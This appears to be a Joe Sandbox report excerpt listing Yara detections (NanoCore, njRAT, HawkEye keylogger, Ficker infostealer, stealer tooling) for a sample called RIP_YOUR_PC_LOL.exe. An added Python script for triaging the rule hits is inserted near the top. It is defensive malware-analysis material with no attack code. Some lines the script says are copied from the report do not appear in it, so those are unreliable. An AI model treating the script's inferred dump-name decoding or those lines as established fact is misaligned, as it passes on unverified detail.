                    Source: C:\Users\user\AppData\Roaming\22.exe, type: DROPPED Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\healastounding.exe, type: DROPPED Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: C:\Users\user\AppData\Roaming\healastounding.exe, type: DROPPED Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\healastounding.exe, type: DROPPED Matched rule: Detects NanoCore Author: ditekSHen
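The matched-rule list above is easier to act on once the hits are grouped by dropped file and by process, and once the memory-dump file names are decoded. The script below is an added example written for this page, not Joe Sandbox code. It parses report lines in the two shapes the report uses ("<description> Author: <name>" and "<RuleName> key = value, ..."), maps rule descriptions to families through a keyword table of my own, and decodes the .sdmp file name under the assumption, inferred from this report rather than documented by Joe Sandbox, that its fields are process index, stage, id, base address, page protection, an undecoded field, region type and module index. The sample lines are copied from this report.

```python
"""Triage helper for the Yara 'Matched rule' lines of a Joe Sandbox report.
Added example, not Joe Sandbox code.  Groups family hits per dropped file and
per process, and flags hits that fired outside the mapped image of a module."""
import re
from collections import defaultdict

# Rule descriptions spell families inconsistently ("Detetcs the Nanocore RAT",
# "Detects NanoCore", "Identify njRat", "NjRAT / Bladabindi"); match on a keyword.
# Generic indicators ("reversed ASEP", "BlackMoon RunTime") map to no family on purpose.
FAMILY_KEYWORDS = {"nanocore": "NanoCore", "njrat": "njRAT", "hawkeye": "HawkEye",
                   "asyncrat": "AsyncRAT", "azorult": "Azorult", "dcrat": "DCRat"}

# winnt.h constants used to decode the .sdmp name.  ASSUMPTION: the field layout
# <proc idx>.<stage>.<id>.<base addr>.<protect>.<?>.<region type>.<module idx>.sdmp
# is inferred from this report (process 9 / base 0x842000 lines up with the
# "9.2.Opus.exe.840000.0.unpack" naming), not taken from Joe Sandbox documentation.
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
REGION_TYPE = {0x1000000: "MEM_IMAGE", 0x40000: "MEM_MAPPED", 0x20000: "MEM_PRIVATE"}

# Tolerates the fused "MEMORYMatched rule" form the extracted report uses.
LINE_RE = re.compile(r"Source:\s*(?P<source>.+?),\s*type:\s*(?P<type>[A-Z]+)"
                     r"\s*Matched rule:\s*(?P<rule>.+?)\s*$")
SDMP_RE = re.compile(r"^([0-9A-F]{8})\.([0-9A-F]{8})\.\d+\.([0-9A-F]{16})\.([0-9A-F]{8})"
                     r"\.[0-9A-F]{8}\.([0-9A-F]{8})\.[0-9A-F]{8}\.sdmp$")


def parse_rule(rule_text):
    """Return (rule_name, description, author); rule_name is None for the short form."""
    m = re.match(r"^(.*?)\s+Author:\s*(.+)$", rule_text)
    if m:
        return None, m.group(1), m.group(2)
    name, _, meta = rule_text.partition(" ")          # long form: "Name key = value, ..."
    fields = {}
    for part in re.split(r",\s+(?=\w+ = )", meta):
        key, _, value = part.partition(" = ")
        fields[key] = value
    return name, fields.get("description", ""), fields.get("author", "")


def family_of(text):
    """Map a rule name/description to a family label, or None for generic indicators."""
    lowered = text.lower()
    for keyword, family in FAMILY_KEYWORDS.items():
        if keyword in lowered:
            return family
    return None


def decode_sdmp(name):
    """Decode a memory-dump file name into process index, base, protection and region type."""
    m = SDMP_RE.match(name)
    if not m:
        return None
    proc, stage, base, protect, region = m.groups()
    return {"process_index": int(proc, 16),
            "stage": int(stage, 16),          # kept raw; its meaning is not decoded here
            "base": int(base, 16),
            "protect": PAGE_PROTECT.get(int(protect, 16), hex(int(protect, 16))),
            "region_type": REGION_TYPE.get(int(region, 16), hex(int(region, 16)))}


def triage(lines):
    """Aggregate family hits per dropped file, per process and for the sample itself."""
    dropped = defaultdict(set)     # dropped file path -> families
    processes = defaultdict(set)   # process index -> families seen in its memory
    sample = set()                 # families matched on the submitted file
    non_image_hits = []            # (process idx, family, protect, region type)
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue
        name, desc, _author = parse_rule(m.group("rule"))
        family = family_of(f"{name or ''} {desc}")
        if family is None:
            continue
        source, src_type = m.group("source"), m.group("type")
        if src_type == "DROPPED":
            dropped[source].add(family)
        elif src_type == "SAMPLE":
            sample.add(family)
        elif src_type == "MEMORY" and (info := decode_sdmp(source)):
            processes[info["process_index"]].add(family)
            # A family rule firing in a private or mapped writable region, rather than
            # in the module's mapped image, is the signature of an unpacked or injected payload.
            if info["region_type"] != "MEM_IMAGE":
                non_image_hits.append((info["process_index"], family,
                                       info["protect"], info["region_type"]))
    return {"dropped": dict(dropped), "processes": dict(processes),
            "sample": sample, "non_image_hits": non_image_hits}


# Constructed input: lines copied from this report.
SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Roaming\gay.exe, type: DROPPEDMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen",
    r"Source: C:\Users\user\AppData\Roaming\Opus.exe, type: DROPPEDMatched rule: Detetcs the Nanocore RAT Author: Florian Roth",
    r"Source: C:\Users\user\AppData\Roaming\3.exe, type: DROPPEDMatched rule: DCRat payload Author: ditekSHen",
    r"Source: C:\Users\user\AppData\Roaming\3.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen",
    r"Source: C:\Users\user\AppData\Roaming\test.exe, type: DROPPEDMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen",
    "Source: 00000009.00000000.414257385.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth",
    "Source: 00000009.00000002.707363158.0000000003ECB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>",
    "Source: 00000019.00000003.459495184.0000000000673000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group",
    "Source: RIP_YOUR_PC_LOL.exe, type: SAMPLEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT",
]

if __name__ == "__main__":
    for key, value in triage(SAMPLE_LINES).items():
        print(key, value)
```

Hits whose region type is MEM_PRIVATE or MEM_MAPPED with PAGE_READWRITE protection (for example process index 9, which the report's own unpack naming identifies as Opus.exe, and the Azorult hits in process index 0x19) point at unpacked or injected payloads rather than the on-disk image; those are the regions to dump first when extracting the RAT configuration. The same rule firing in a PAGE_READONLY MEM_IMAGE region only tells you that the module's file on disk already matches, which the DROPPED entries show more directly.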
                    Source: a.exe.4.dr Static PE information: 4 sections with a blank section name
                    Source: C:\Users\user\AppData\Roaming\healastounding.exe Code function: 4_2_009466CB
                    Source: C:\Users\user\AppData\Roaming\healastounding.exe Code function: 4_2_0090576E
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe Code function: 5_2_00F1D426
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe Code function: 5_2_00F2D5AE
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe Code function: 5_2_00F1D523
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe Code function: 5_2_00F27646
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe Code function: 5_2_00F529BE
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe Code function: 5_2_00F56AF4
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe Code function: 5_2_00F7ABFC
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe Code function: 5_2_00F73CBE
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe Code function: 5_2_00F73C4D
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe Code function: 5_2_00F73DC0
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe Code function: 5_2_00F73D2F
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe Code function: 5_2_00F1ED03
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe Code function: 5_2_00F2AFA6
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe Code function: 5_2_00F1CF92
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe Code function: 5_2_01672477
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe Code function: 5_2_03205758
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe Code function: 5_2_03201D98
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe Code function: 5_2_03207FCA
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe Code function: 5_2_03207FD0
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe Code function: 5_2_03206048
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe Code function: 5_2_0320708A
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe Code function: 5_2_03207098
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe Code function: 5_2_00F4C7BC
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe Code function: 5_2_03201DA8
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe Code function: 7_2_0040D390
                    Source: C:\Users\user\AppData\Roaming\gay.exe Code function: 8_2_000D6B5E
                    Source: Pluto Panel.exe.0.dr Static PE information: 3 resources, Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 0fd7de5367376231a788872005d7ed4f.exe.0.dr Static PE information: 4 resources, Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: ___11.19.exe.0.dr Static PE information: 8 resources, Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: C:\Users\user\AppData\Roaming\4.exe Section loaded: api-ms-win-core-synch-l1-2-0.dll
                    Source: C:\Users\user\AppData\Roaming\4.exe Section loaded: api-ms-win-core-fibers-l1-1-1.dll
                    Source: C:\Users\user\AppData\Roaming\4.exe Section loaded: api-ms-win-core-synch-l1-2-0.dll
                    Source: C:\Users\user\AppData\Roaming\4.exe Section loaded: api-ms-win-core-fibers-l1-1-1.dll
                    Source: C:\Users\user\AppData\Roaming\4.exe Section loaded: api-ms-win-core-localization-l1-2-1.dll
                    Source: C:\Users\user\AppData\Roaming\4.exe Section loaded: dxgidebug.dll
                    Source: RIP_YOUR_PC_LOL.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: RIP_YOUR_PC_LOL.exe, type: SAMPLE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: RIP_YOUR_PC_LOL.exe, type: SAMPLE Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: RIP_YOUR_PC_LOL.exe, type: SAMPLE Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: RIP_YOUR_PC_LOL.exe, type: SAMPLE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: RIP_YOUR_PC_LOL.exe, type: SAMPLE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: RIP_YOUR_PC_LOL.exe, type: SAMPLE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: RIP_YOUR_PC_LOL.exe, type: SAMPLE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: RIP_YOUR_PC_LOL.exe, type: SAMPLE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: RIP_YOUR_PC_LOL.exe, type: SAMPLE Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.206ac1d.13.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.d4dd52.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5a556c1.5.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 9.2.Opus.exe.840000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 9.2.Opus.exe.840000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 9.2.Opus.exe.840000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 9.2.Opus.exe.840000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 9.0.Opus.exe.840000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 9.0.Opus.exe.840000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 9.0.Opus.exe.840000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 9.0.Opus.exe.840000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 4.2.healastounding.exe.34865dc.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.2.healastounding.exe.34865dc.7.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 8.0.gay.exe.d0000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 8.0.gay.exe.d0000.2.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.c8867b.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 11.0.22.exe.5f65b6.17.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 5.2.Pluto Panel.exe.36b9cb4.4.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 5.0.Pluto Panel.exe.f10000.8.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.Pluto Panel.exe.f10000.8.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 5.0.Pluto Panel.exe.f10000.8.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 5.2.Pluto Panel.exe.f6fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.2.Pluto Panel.exe.f6fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 5.2.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.2.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 5.2.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 9.2.Opus.exe.5b00000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 9.2.Opus.exe.5b00000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 9.2.Opus.exe.5b00000.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 5.2.Pluto Panel.exe.f18208.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.2.Pluto Panel.exe.f18208.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 5.2.Pluto Panel.exe.f18208.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 6.2.test.exe.da0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Ficker author = ditekSHen, description = Detects Ficker infostealer, clamav_sig = MALWARE.Win.Trojan.Ficker
                    Source: 8.2.gay.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 8.2.gay.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 7.2.0fd7de5367376231a788872005d7ed4f.exe.24f15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Ficker author = ditekSHen, description = Detects Ficker infostealer, clamav_sig = MALWARE.Win.Trojan.Ficker
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1f6c52e.15.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 5.2.Pluto Panel.exe.f19c0d.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.2.Pluto Panel.exe.f19c0d.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 4.2.healastounding.exe.4474268.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 4.2.healastounding.exe.4474268.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 4.2.healastounding.exe.4474268.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.2.healastounding.exe.4474268.10.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1f6c52e.15.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1d1caed.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1d1caed.10.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 9.2.Opus.exe.5b00000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 9.2.Opus.exe.5b00000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 9.2.Opus.exe.5b00000.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 5.2.Pluto Panel.exe.3b3a1c4.6.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 4.2.healastounding.exe.3479694.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 4.2.healastounding.exe.3479694.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.2.healastounding.exe.3479694.5.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Ficker author = ditekSHen, description = Detects Ficker infostealer, clamav_sig = MALWARE.Win.Trojan.Ficker
                    Source: 5.2.Pluto Panel.exe.7700000.9.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
